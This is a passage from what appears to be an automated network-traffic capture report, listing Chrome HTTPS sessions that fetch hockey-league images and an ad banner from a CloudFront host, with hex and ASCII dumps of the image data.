                                                                                                                          2025-01-13 21:01:17 UTC12792INData Raw: 78 0c 2e 16 a5 39 54 9d 37 27 45 41 a7 07 ef 3e 59 54 e6 95 de d6 bb 7e a7 b0 b1 10 84 5a a9 52 a4 5a 49 d9 4a fb f9 a5 64 67 f8 73 c5 a3 c3 b1 ea de 2c d0 2e fc 45 a7 9d 4a e2 08 2e 65 1a c4 91 99 e4 59 fe cb 1b cb 8b 5f 2f 23 3c b2 17 6c 00 0e 71 c7 e8 b8 6c db 3e c0 aa 59 46 16 bd 18 c6 31 72 51 8d 08 b4 97 27 b4 6a 29 d5 e6 f2 4a 4a 2a ef a7 5f 1a a6 17 09 59 4b 13 52 12 6e e9 5d c9 eb af 2a be 96 fb ae 75 11 7c 69 d7 67 b7 8a ee 2d 7b c5 2d 02 bb c7 3c bf db 1f ba 56 49 04 78 8d fc 8e 49 ce 47 9b e5 03 82 01 35 db 3c f3 8a 61 39 53 9e 26 82 95 93 8a f6 0b 99 a7 17 2f 79 73 ec ad 67 c9 ed 1a ba ba 30 58 3c bd a4 d5 39 5a f6 6f 99 d9 6b 6e df 9f 29 fa 05 fb 39 6a 9a d6 a5 e0 fd 5e 3d 6f 54 ba d5 e4 b0 d6 af ed 62 9e f2 4f 36 6f 26 27 01 15 9f 03 38 15
                                                                                                                          Data Ascii: x.9T7'EA>YT~ZRZIJdgs,.EJ.eY_/#<lql>YF1rQ'j)JJ*_YKRn]*u|ig-{-<VIxIG5<a9S&/ysg0X<9Zokn)9j^=oTbO6o&'8
                                                                                                                          2025-01-13 21:01:17 UTC3592INData Raw: f4 77 ed 45 f1 eb c7 1f 03 be 19 78 73 c6 1e 1f d3 ec 66 d5 35 5b b8 6d ae 61 be 8a 56 8e 3d f6 f2 4a e1 56 39 63 60 c1 97 1c b1 e3 3d f9 af 94 e1 ec 9b 0f 98 e3 2a d0 ab 26 a3 14 da 69 ae e9 75 4f b9 f6 1c 4b 9d e2 72 cc 15 2c 45 28 a7 29 34 9a 92 76 d9 be 8d 75 47 cc 9a 67 ed 53 fb 6d 6b 3a 75 ae af a4 fc 2b b5 bc b1 bd 89 27 82 78 b4 8d 45 e3 96 29 14 32 3a 30 ba c1 56 04 10 47 51 5f 5f 53 87 78 7a 9c dc 27 8b 69 a7 66 9c e1 a3 ff 00 c0 4f 8a a7 c4 dc 4b 52 0a a5 3c 1a 71 6a e9 a8 4e cd 3e bf 11 ec bf b3 5f ed 51 e3 bf 8e 89 e2 bf 07 ea ba 45 86 91 e3 2d 1e ce 4b 9b 36 11 cc 2c d9 c3 79 5b 27 85 e4 32 ae c9 0a 6e c4 99 20 9f ba 47 3e 06 7d c3 b8 6c b7 d8 d7 84 dc a9 49 d9 ed 7e fa 3b 5b 55 7b 69 f7 9f 45 c3 dc 4d 8a cd 15 6c 3d 48 46 35 a2 9b 5a 3b 76
                                                                                                                          Data Ascii: wExsf5[maV=JV9c`=*&iuOKr,E()4vuGgSmk:u+'xE)2:0VGQ__Sxz'ifOKR<qjN>_QE-K6,y['2n G>}lI~;[U{iEMl=HF5Z;v
                                                                                                                          2025-01-13 21:01:17 UTC1024INData Raw: 5b 3a a4 a0 44 fa 84 ab b5 99 58 0f 99 06 78 3c 57 ec 79 06 36 a6 0b 87 f1 18 9a 56 e6 8c f4 be da a8 2f d4 fc 43 88 f0 14 b1 dc 49 86 c2 56 bf 2c a1 ad b7 d1 cd f9 f6 3e 83 f0 d7 ec ad f0 db e0 56 89 e3 1f 13 f8 2e e3 52 9a f2 fb 41 be b3 71 79 3c 72 a7 96 c9 e6 12 02 44 87 76 50 73 9e 99 e2 be 62 bf 11 62 f3 2a 94 68 e2 14 52 53 8b d1 35 ae dd df 73 eb 70 fc 33 83 ca e9 57 af 86 72 6d c2 4b 56 9e 96 bf 44 bb 1f 1e fc 24 b8 f8 50 bf b1 3f 8b 22 d6 a4 d1 47 89 cc 3a af 92 b7 06 db ed fb f6 8f 2b 60 7f de e7 38 d9 8f c2 be ef 32 8e 37 fd 61 a2 e9 f3 fb 3b c6 f6 bf 2f 9f 97 a9 f9 ee 57 2c 02 e1 ba ca a3 87 b4 b4 ed 7b 73 79 5b af a1 43 e2 cf fc a3 df e1 87 fd 86 17 f9 6a 15 a6 5b ff 00 25 46 2b fc 3f fc 81 96 69 ff 00 24 96 0f fc 7f fc 99 fa b1 f0 ef e1 b7
                                                                                                                          Data Ascii: [:DXx<Wy6V/CIV,>V.RAqy<rDvPsbb*hRS5sp3WrmKVD$P?"G:+`827a;/W,{sy[Cj[%F+?i$
                                                                                                                          2025-01-13 21:01:17 UTC10138INData Raw: 7f f2 34 5f e1 67 bb c7 5f f2 28 97 f8 a2 7a 2f ec 7e aa 9f b3 6f 81 c2 a8 50 6d 66 3c 0c 72 6e 25 26 bc ae 27 ff 00 91 b5 7f 55 f9 23 d8 e1 45 6c 9b 0f e8 ff 00 36 7d 2b 5f 24 7d 91 f8 e7 fb 4f eb 3a 1f 87 7f 6d df 0b eb de 26 95 60 d2 74 f3 a3 cf 76 ee 86 45 58 63 90 b3 92 8a 18 b0 00 1e 00 24 fa 57 ef 1c 3f 4a a5 5e 1e ab 4a 8a bc 9f 3a 5e b6 d0 fe 79 e2 4a d4 a8 f1 2d 1a b5 dd a0 b9 1b eb a2 7a 9f 67 8f da b3 f6 43 04 15 f1 0d 80 23 a7 fc 4b 2e 7f f9 1a be 03 fd 5c cf 3f e7 db ff 00 c0 97 ff 00 24 7e 8d fe b3 f0 ff 00 fc fd 5f f8 0c bf f9 13 ea 30 74 8f 16 78 7f 23 17 9a 5e b3 6b dc 10 25 b7 b8 4e e0 e0 80 c8 dd 08 06 be 37 f7 94 2a f6 94 5f dc d3 ff 00 33 ed ff 00 77 88 a5 de 32 5f 7a 6b fc 8f e7 3f c4 1a 67 8d 7c 33 ad eb 7f b3 95 b3 b4 d1 3f 88 a3
                                                                                                                          Data Ascii: 4_g_(z/~oPmf<rn%&'U#El6}+_$}O:m&`tvEXc$W?J^J:^yJ-zgC#K.\?$~_0tx#^k%N7*_3w2_zk?g|3?
                                                                                                                          2025-01-13 21:01:17 UTC6517INData Raw: be 1c 41 e3 6f 0f 6b b7 fa 85 c3 ea 10 da 34 57 4b 16 cd 92 a4 8d 90 51 54 82 0a 0f 5a e4 e1 ee 27 af 99 62 de 1e ad 34 95 9b ba bf 46 bb fa 9d 7c 49 c2 78 7c af 06 b1 34 6a 36 f9 92 b3 b7 54 fb 7a 1f 70 f8 77 58 d4 f5 ef d8 4e f3 55 d6 2e 1e ea ee 5f 06 6a 6a f2 c8 77 3b f9 76 b3 46 a5 98 f2 4e d5 19 27 93 d4 d7 e7 75 e9 42 97 12 46 10 56 5e d6 3a 7a c9 33 f4 cc 3d 59 d5 e1 79 54 a8 ee fd 94 b5 f4 8b 47 c0 3f b2 87 ec a9 e1 3f da 03 c2 ba d6 bd e2 2d 66 fb 4d 97 4c bd 5b 64 4b 51 11 56 53 1a be 4f 98 ac 73 93 8e 2b f4 de 23 e2 2a f9 5d 68 52 a5 04 d4 95 f5 bf 7b 74 3f 29 e1 7e 18 c3 e6 d4 2a 55 ad 52 51 71 76 d2 dd af d5 1a 9e 10 f0 27 fc 33 ff 00 ed bf e1 ff 00 01 78 57 55 b8 b8 b4 17 16 d0 bc b2 e1 5e 58 6f 2d c3 49 1c 81 30 ac 32 dc 71 d4 03 d4 66 b1
                                                                                                                          Data Ascii: Aok4WKQTZ'b4F|Ix|4j6TzpwXNU._jjw;vFN'uBFV^:z3=YyTG??-fML[dKQVSOs+#*]hR{t?)~*URQqv'3xWU^Xo-I02qf


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          61192.168.11.204987054.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC445OUTGET /app/uploads/gthl/2025/01/06205151/DECAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 28149
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Tue, 07 Jan 2025 01:51:52 GMT
                                                                                                                          ETag: "5cd3006547a71f04f0591c3cdf4f23e2"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 16f689172b396b7e266a396b6b5d6754.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: Ap7M98XcUZmuLWBqxkxZcpGfhieXVFYX4SI_czJMzgaJ74--lC0Q1g==
                                                                                                                          2025-01-13 21:01:17 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 04 06 05 07 08 03 09 0a ff c4 00 5a 10 00 01 03 02 03 04 03 09 09 0b 07 0b 04 03 01 00 00 01 02 03 04 05 06 11 31 07 12 21 51 08 13 41 14 16 22 57 61 71 92 93 e1
                                                                                                                          Data Ascii: JFIF&&CC"Z1!QA"Waq
                                                                                                                          2025-01-13 21:01:17 UTC9365INData Raw: cc e8 32 57 b5 ae 45 54 45 d1 78 79 8c 1d a0 e1 fa 1c 43 86 aa 69 aa e1 6b 9f 12 6f c2 fc bc 28 dd cd 14 ae 1b 49 71 30 c4 2a 58 b8 24 9e fd 8d 35 7f 59 93 36 f0 47 93 e2 32 c9 e3 72 3a f2 94 92 6d 5e 51 94 65 6d ea e9 2b 3d 96 bd f7 ef 47 9a ec 78 72 f9 89 2a 56 96 c9 6e 96 aa 46 f1 76 e2 78 2d 4f 2a af 04 37 08 36 19 8e a5 6a 3a 46 50 43 9f 63 ea 33 54 f9 91 4e da d9 4d 9e 1b 3e 08 b7 a3 22 6b 65 aa 6a d4 4c e4 4e 2e 72 aa e5 9f 99 32 43 9b be 62 2b 76 1f 89 26 b8 49 b8 d5 4d e5 55 54 44 44 f2 aa 91 8c d2 3c 53 c4 ca 8e 16 2a c9 db 75 db b1 39 0f 82 7c 9a 39 55 3c c3 3a ab 2d 69 45 49 d9 a8 c6 2a 4a e9 6e 6e ea fb 5d fd 47 44 d4 6c 37 1d 42 c5 74 71 50 cd 97 e2 b2 a3 25 5f 9d 10 d3 2f 56 0b ce 1d aa ee 2b d5 be 6a 49 72 cd 11 e9 c1 c9 cd 17 45 f9 0f 51
                                                                                                                          Data Ascii: 2WETExyCiko(Iq0*X$5Y6G2r:m^Qem+=Gxr*VnFvx-O*76j:FPCc3TNM>"kejLN.r2Cb+v&IMUTDD<S*u9|9U<:-iEI*Jnn]GDl7BtqP%_/V+jIrEQ
                                                                                                                          2025-01-13 21:01:17 UTC9000INData Raw: 78 29 9f 15 f9 8d 9a 86 b6 cd 0d 1c 10 d1 d7 d2 ac 11 c6 d6 46 ad 95 aa 8a d4 4c 93 2e 27 93 56 ff 00 7c 5d 6f 15 9e bd df c4 86 5f 2f 31 b1 23 8e eb 56 d6 b5 32 44 49 9c 88 89 f3 9a 92 d1 ba 93 a5 1a 2e ae c4 db 5b 3a 7f f4 77 a8 f8 5e c2 50 c7 54 c7 c3 05 f1 ea 46 31 93 d6 f2 6f 6e 1d 6e fe a3 b8 76 89 b4 fb be 1d bb b6 9a d5 23 5e d9 11 ce c9 5c b9 23 51 72 4c b2 e7 92 98 78 17 6c b7 2b 86 24 a6 a0 c4 32 d3 c3 47 3a 39 8e 95 cf c9 18 ec b3 6a aa af 04 e2 99 7c a7 50 d4 d5 d5 56 49 d6 d5 d4 49 33 f2 cb 7a 47 2b 97 2e 59 a9 f2 3a 70 c8 f0 ab 0f c8 ca 2b 5a d6 bf 1f 49 e3 ab f8 49 ce 5e 69 f0 ea 35 64 a9 eb 29 72 6d ec b2 df 17 d4 ff 00 13 d8 55 35 76 ca ba 59 20 75 75 3a b6 56 2b 7f d2 27 6a 1a 96 cc 9d 6e b1 db 2b ec 92 d7 53 b2 68 ae 13 48 91 2c ad 47
                                                                                                                          Data Ascii: x)FL.'V|]o_/1#V2DI.[:w^PTF1onnv#^\#QrLxl+$2G:9j|PVII3zG+.Y:p+ZII^i5d)rmU5vY uu:V+'jn+ShH,G
                                                                                                                          2025-01-13 21:01:17 UTC1592INData Raw: 4a 39 5b f1 55 53 cc 40 04 12 aa ab aa a9 9b 73 e3 d4 3f 9b 0c 13 eb 2d 44 93 35 8d 7a a6 4c 4c 93 81 96 13 4a 9c a2 f8 db ec 31 ca 0d ce 32 5c 2e 7c 80 06 23 28 00 bc 90 c9 16 ea c8 c5 6e f2 66 9e 52 6c da b9 17 4b 61 40 01 04 80 0e e5 d9 2e c9 56 75 87 14 e2 9a 6c a3 e0 fa 4a 47 a7 c6 e4 f7 a7 2e 49 f2 9a 78 dc 6d 2c 05 27 56 ab f4 2e 2d 9d ed 1c d1 cc 6e 93 e3 63 82 c1 47 ae 52 7b a2 ba 5f e0 b7 b7 b1 0d 92 ec 97 ae ea 71 4e 29 a6 fb 9f 07 d2 52 3d 3e 37 27 bd 39 72 43 bb b4 e0 83 4e 08 0f 9b e3 b1 d5 71 f5 79 5a be a5 c1 23 f5 f6 8d 68 d6 0b 45 b0 4b 07 83 5d 72 93 df 27 d2 ff 00 05 b9 20 00 34 cf 42 79 1e 47 d5 dd 2b 33 c9 64 9a 67 23 5a d6 a6 5e 44 44 4e c4 43 2a 6a f7 da d1 28 6d 55 2e 62 b1 73 9a 78 d7 25 95 fc 91 7f 25 34 4e 7c 54 3d 3d e7 a5 56
                                                                                                                          Data Ascii: J9[US@s?-D5zLLJ12\.|#(nfRlKa@.VulJG.Ixm,'V.-ncGR{_qN)R=>7'9rCNqyZ#hEK]r' 4ByG+3dg#Z^DDNC*j(mU.bsx%%4N|T==V


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          62192.168.11.204987154.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC660OUTGET /app/uploads/gthl/2024/11/13195651/HHOF23_ShootSaveCall_300x250.gif HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/gif
                                                                                                                          Content-Length: 114750
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Thu, 14 Nov 2024 00:56:52 GMT
                                                                                                                          ETag: "4028a902fd738bcbff571168cac7cc91"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 6306947fb6ab60dc617ca2e025941652.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: D7m5cAALXEZsRx0SbUj_EblajwIhIcaXLuUSU1f7DyxyIISUdnLGjw==
                                                                                                                          2025-01-13 21:01:17 UTC15897INData Raw: 47 49 46 38 39 61 2c 01 fa 00 f7 ff 00 ff ff ff 9d 0c cd 00 00 f4 9f 11 e0 cb 90 71 af 11 ec 8d 0d de 89 07 b6 ac 20 22 c2 11 d3 fc d0 b0 50 68 ae d8 1b cf cc 10 7b ea 1b be 61 2d 54 e8 1b 9a b1 67 dc 07 20 4f b1 11 df ee 1b ae ea 1e cf 50 4c 4c 3a 10 11 55 0e 11 d8 1b be 71 6c 6c dc b6 d1 11 29 59 b2 11 cf b4 11 b1 0f 0c 0c 79 44 6d d0 d8 f6 6e 44 30 7c 07 d2 f7 24 be 01 01 01 00 6b b1 11 11 1c e1 cc d9 c4 90 b5 4f 34 27 c5 11 be 79 b3 d9 e6 ae 8b a8 cd e8 a3 67 93 93 8c 89 f2 d7 ef 76 52 48 da 1b b0 7d 07 db ae 0c 9d c3 2b 2c db 11 8b 1c 82 c0 68 66 fa 20 1c 1c fc 24 ce b7 b1 ae e7 11 37 85 11 1e 9d 69 50 9d 0b ae e7 11 97 4b 97 cd e7 5a be c8 11 9c e6 72 cf d8 1b dc 0c 0d 34 ca 1a cd 8b 1c 1c e8 97 d7 cf be b6 a4 11 c2 fc d9 cd 27 8e c9 8d 7c 72 87 07
                                                                                                                          Data Ascii: GIF89a,q "Ph{a-Tg OPLL:Uqll)YyDmnD0|$kO4'ygvRH}+,hf $7iPKZr4'|r
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 65 53 c6 a7 7c ce 27 7d ca 67 03 5c 4d 3b 3d 60 59 d8 95 9b 54 65 5c ac 1d c2 d9 80 d8 ad d1 4b 80 80 08 74 4a 2f 66 e0 dd dd 59 56 15 e3 df f9 1d 71 8a e0 12 1c a7 b4 45 db 28 d4 e5 6e dd 9d 3c e8 02 41 3c 88 2c 58 80 6f ba 81 4a 61 26 2b 22 89 30 15 66 db d1 d8 4b ee 8a 74 65 8e 47 04 5f 7d c6 28 74 58 a2 0e d0 c2 39 c4 28 8e e6 a8 8e ee 28 8f f6 68 8e ba e7 ec 01 4f 78 c6 22 5c 94 13 d6 ac 90 d6 04 15 c4 e1 ff 06 db a9 00 01 50 c2 2c 6d ca 2c cd 92 6b 9d 14 43 39 68 84 be 25 5c 2a c0 12 74 a9 02 e8 81 1e d8 d6 40 e1 a5 08 c8 5c a4 04 83 0a 2c d1 40 51 03 c1 09 26 3f 41 97 47 91 1f ae b0 ca 9c 82 c4 ae a4 cc 8e 15 55 18 54 a1 25 96 80 e8 81 02 2d 9c 40 e8 bc 27 90 12 6a fe 7d c1 76 21 2a 65 29 2a 23 30 aa a3 26 2a a4 2e 6a 01 b6 53 0c dd 1a 22 ed 87 80
                                                                                                                          Data Ascii: eS|'}g\M;=`YTe\KtJ/fYVqE(n<A<,XoJa&+"0fKteG_}(tX9((hOx"\P,m,kC9h%\*t@\,@Q&?AGUT%-@'j}v!*e)*#0&*.jS"
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: fc e3 82 94 49 c3 53 b6 8c 14 21 f2 8b e9 76 8b 0b 9a 70 f1 7b 3f 5c 11 53 56 34 c5 39 45 2e 5a af 90 52 89 02 c0 ff 9f 11 13 b3 9b 87 4c e5 2d ab a4 1d 90 78 07 96 e9 bc 16 3b 3f 84 9e a8 a8 42 fb 92 fc 0f a0 8c b6 be ec a4 a3 90 29 e2 5f 82 04 82 85 88 3e a2 40 aa 10 5b 70 12 f3 b9 7c 9e 73 95 a5 5c 91 c5 ce 64 01 66 ea f1 a1 fd 3c 47 45 43 a4 b6 8b 84 04 80 8d 38 66 32 53 c4 91 37 c3 69 ee e8 b3 8a 10 47 b1 13 c5 23 48 91 e5 ac 69 52 f7 7a 22 50 28 85 a7 f1 84 2a 0e 07 d9 93 34 c6 4f 35 50 11 6c ea 84 00 b3 9c 73 35 45 6c ad 53 3a de ef 6b a8 a8 74 f4 3e 37 ea 2c bf 38 d3 1c c5 ea 57 bb 02 85 48 91 91 c3 54 4b f6 5b 21 bc ea c4 d1 c4 d7 bd 76 6f 71 83 ec 6e c8 08 c4 b3 51 24 6c a4 eb 0c 6f 4e f3 b3 14 ab 10 36 c0 05 1e f0 6a 0c 7c d8 2a 31 78 c1 01 ce
                                                                                                                          Data Ascii: IS!vp{?\SV49E.ZRL-x;?B)_>@[p|s\df<GEC8f2S7iG#HiRz"P(*4O5Pls5ElS:kt>7,8WHTK[!voqnQ$loN6j|*1x
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: c6 34 7e 81 0c 7d 64 b0 b3 b0 dd 92 aa 39 88 ca 82 a8 72 11 16 58 ca 8c f7 24 12 14 1a 0c 25 2a 19 62 2d 62 b7 a8 ff d6 09 e3 27 19 db 49 2f 1d a5 c3 fd f8 90 3f b0 e4 e9 26 76 ba 11 31 68 80 b4 57 fe 87 35 44 25 86 2d a0 80 07 ad e8 b2 97 0f ba 47 d0 a4 a0 0b 75 19 af 78 05 a2 2b 11 69 21 9f 75 0c 8c ae ac f7 84 14 dc 4f 1f 31 a8 6f 7d d5 47 0b f6 c5 d1 6c 77 3c c1 9f d7 2b 06 44 a7 d5 9c 5d b0 00 08 06 6e 69 83 2b 22 ad 05 57 db ad 12 1d 69 ec 59 40 e0 5d 6b 78 5a 09 ee 35 45 60 f4 24 b1 45 8e 3e a6 81 8d 51 c0 60 11 5e 0a f1 a8 79 60 92 d8 c2 f6 1f 2a cd 1c 46 59 6a 90 27 bc b4 4e fa c9 0e 8d 3d 82 06 13 da c3 1e 67 31 41 2c 62 61 0e 73 80 03 14 b8 cc 98 0c 67 87 1f 97 2c b9 c9 ef 5d 09 0f 99 be e4 01 49 65 40 cf de 42 9b c4 12 06 24 96 40 be fa 48 46
                                                                                                                          Data Ascii: 4~}d9rX$%*b-b'I/?&v1hW5D%-Gux+i!uO1o}Glw<+D]ni+"WiY@]kxZ5E`$E>Q`^y`*FYj'N=g1A,basg,]Ie@B$@HF
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 38 0a 6b 92 00 f9 63 3f 16 84 bf f6 7b c1 16 5c bf 94 c8 be 2f b2 3c c3 5b 89 18 88 3e cc 4b 81 43 7b bc f3 3a 3f 50 1a 05 1d 9c 3e 22 1c bc 29 78 80 8c f0 3c 11 e8 03 19 79 8c 33 90 01 4a a0 91 1a d9 a5 d2 bb 98 ac bb 18 05 bb 11 ac 73 3d f2 49 c0 3d a2 a8 d3 e3 32 61 6a 01 1e 74 09 51 48 bb 75 f0 3d e4 5b c3 e3 c3 c0 ff 13 90 38 0c dc 1f 39 94 12 95 72 33 4a d2 1d 38 2b a0 22 dc c3 21 1c bc 94 10 af 3f b4 be 94 50 85 f5 53 85 08 b8 41 95 d8 00 42 cc be 45 9c 82 46 7c c4 0d 88 09 20 04 a5 08 78 c4 42 bc 44 46 c4 44 47 d4 c4 46 7c 13 15 90 08 88 f9 01 38 90 01 11 90 11 3f f1 2a f0 69 ba 43 81 3a 3d 10 94 45 10 30 d1 f9 c2 07 b4 3d 05 ac 21 06 44 94 56 a4 86 16 20 85 2f aa 84 75 00 31 47 7a 29 e8 3a 02 e0 b3 c0 a1 c8 40 24 92 12 51 f9 9d 96 09 ac fd 70 33
                                                                                                                          Data Ascii: 8kc?{\/<[>KC{:?P>")x<y3Js=I=2ajtQHu=[89r3J8+"!?PSABEF| xBDFDGF|8?*iC:=E0=!DV /u1Gz):@$Qp3
                                                                                                                          2025-01-13 21:01:17 UTC6908INData Raw: 6e d1 c0 5c a8 d4 3b 7f a3 7a 66 d8 4d be 13 92 bd f3 19 28 35 00 fc 38 37 67 88 14 d8 d7 54 0b 44 6f 4b 56 0d 50 80 86 af 16 70 f4 f8 14 f8 d8 6d 0d ff 73 4c 27 78 8e c1 27 2a e3 a8 41 c9 e7 70 7c f0 93 a3 d2 6b c0 a4 7d 54 f2 88 4c 91 6a 1d 11 6b d7 17 86 9e 16 8c 1f e1 7b 4f d1 7c 7c b0 5b b7 86 13 59 e7 7d 5f 27 63 81 b0 00 cc 00 0c 2e b0 06 96 c7 09 e8 e0 83 09 a9 90 a9 68 02 54 40 05 37 47 05 fb 70 73 f8 20 04 4e b0 96 ac 78 73 56 20 04 fa 57 08 b5 68 05 f4 a0 6b 59 87 13 a9 14 3c c6 28 59 ce 53 7b 8d 36 89 33 74 98 cd 12 8c b6 71 93 1a f1 62 52 89 81 be 98 86 1a b8 6f 89 68 3e d9 57 29 78 68 39 eb c8 6c 74 27 7c 45 d9 76 79 56 95 b3 81 93 d1 a6 6d a8 36 8c 8e d9 9a 16 98 7d 4b d1 6c 61 61 8f 8e 21 92 28 e5 33 90 11 0d c4 40 0c 2e 20 84 9c 20 07 9d
                                                                                                                          Data Ascii: n\;zfM(587gTDoKVPpmsL'x'*Ap|k}TLjk{O||[Y}_'c.hT@7Gps NxsV WhkY<(YS{63tqbRoh>W)xh9lt'|EvyVm6}Klaa!(3@.
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 17 9a 88 55 28 86 86 fb e0 69 a3 67 3c 71 5c 85 6b 5c 0f fa 63 a6 fd 0f a1 7d 66 10 6b 30 8f f1 b0 0e b0 4e f0 0b d6 aa 04 97 87 e8 dd 4c b6 dd 39 b0 82 53 b9 8b ff 8a 5b d7 1c 71 16 4f 18 54 66 ca 83 43 80 62 29 12 62 10 41 b5 1c 13 03 c4 1b e9 6b 40 39 60 66 01 6f a4 90 4c a5 02 40 ed 9a d1 44 23 97 3b a2 cc a0 68 75 02 80 d5 f8 a0 04 d0 cb f6 f0 4b 44 39 80 62 e8 ba 38 59 dc f6 d8 56 c0 9a 83 03 10 ba 38 4e ea 46 16 0b 63 3d c8 ae 73 dc 76 d6 c0 93 0d 04 3e a3 07 7a 9e 1d 7a 26 b3 07 7b a1 d6 b3 ea 68 25 be d1 63 82 65 c5 42 d9 e2 e6 46 36 56 2b e5 33 9b 90 e6 d7 e9 ac 90 c4 5d 7e 8c 28 32 b3 dd 00 16 5a 9b 88 64 71 93 2d 5a 95 cc e7 33 5e 5d e4 df fd 0d 00 13 a8 2d c0 b3 02 83 f5 0c 8a d6 86 0e a9 49 c2 88 83 28 08 06 35 90 26 67 fa 03 09 05 df 13 d0
                                                                                                                          Data Ascii: U(ig<q\k\c}fk0NL9S[qOTfCb)bAk@9`foL@D#;huKD9b8YV8NFc=sv>zz&{h%ceBF6V+3]~(2Zdq-Z3^]-I(5&g
                                                                                                                          2025-01-13 21:01:18 UTC10025INData Raw: 1f 0e d0 08 61 c0 08 5f d0 08 3e dd 08 b7 4c b8 31 71 0a 60 18 a3 11 44 26 0d 14 32 7f 5a 01 5c c0 cb 31 a0 d4 95 15 1e 0b 0d 17 28 a3 49 4f 41 cc 1b bd c8 ad d0 ff d3 f9 9c 49 67 ec 98 42 96 cd 44 40 04 4a f5 05 95 8c ba d9 cc 58 b2 8a a4 0c 90 31 27 86 ba 0e 20 ca 14 bd 9f 46 8a 9d 5f f0 05 44 40 32 9d b0 01 8e b0 58 46 5c d4 4a 38 3a a3 83 c8 cd 7a 0a 1a 9d 32 6f e1 00 a1 85 02 d9 e1 d3 59 a0 d6 82 1c 13 d1 99 02 d7 87 d2 29 0d 68 cb 9a ca 12 1b ae d9 f1 14 33 80 30 74 dc a7 e7 f3 14 8d 6c 18 15 40 02 a2 fc 0d a0 6a d0 dd 0c 17 09 a4 2f 84 f0 1a 7b a0 d4 2a 63 18 2e f4 30 6e 15 41 f1 90 0b b7 fc 14 7d 1c 03 f9 c8 0e b7 2c 70 a6 ac 69 b0 dd 39 31 21 d0 45 20 9a 7c 3a 6d 5e 0d 00 32 9d 5e 19 f3 0e 02 17 1e c4 ec 08 21 6b 74 68 2d c6 19 70 cb 20 9d ca 3f
                                                                                                                          Data Ascii: a_>L1q`D&2Z\1(IOAIgBD@JX1' F_D@2XF\J8:z2oY)h30tl@j/{*c.0nA},pi91!E |:m^2^!kth-p ?


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          63192.168.11.204987354.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
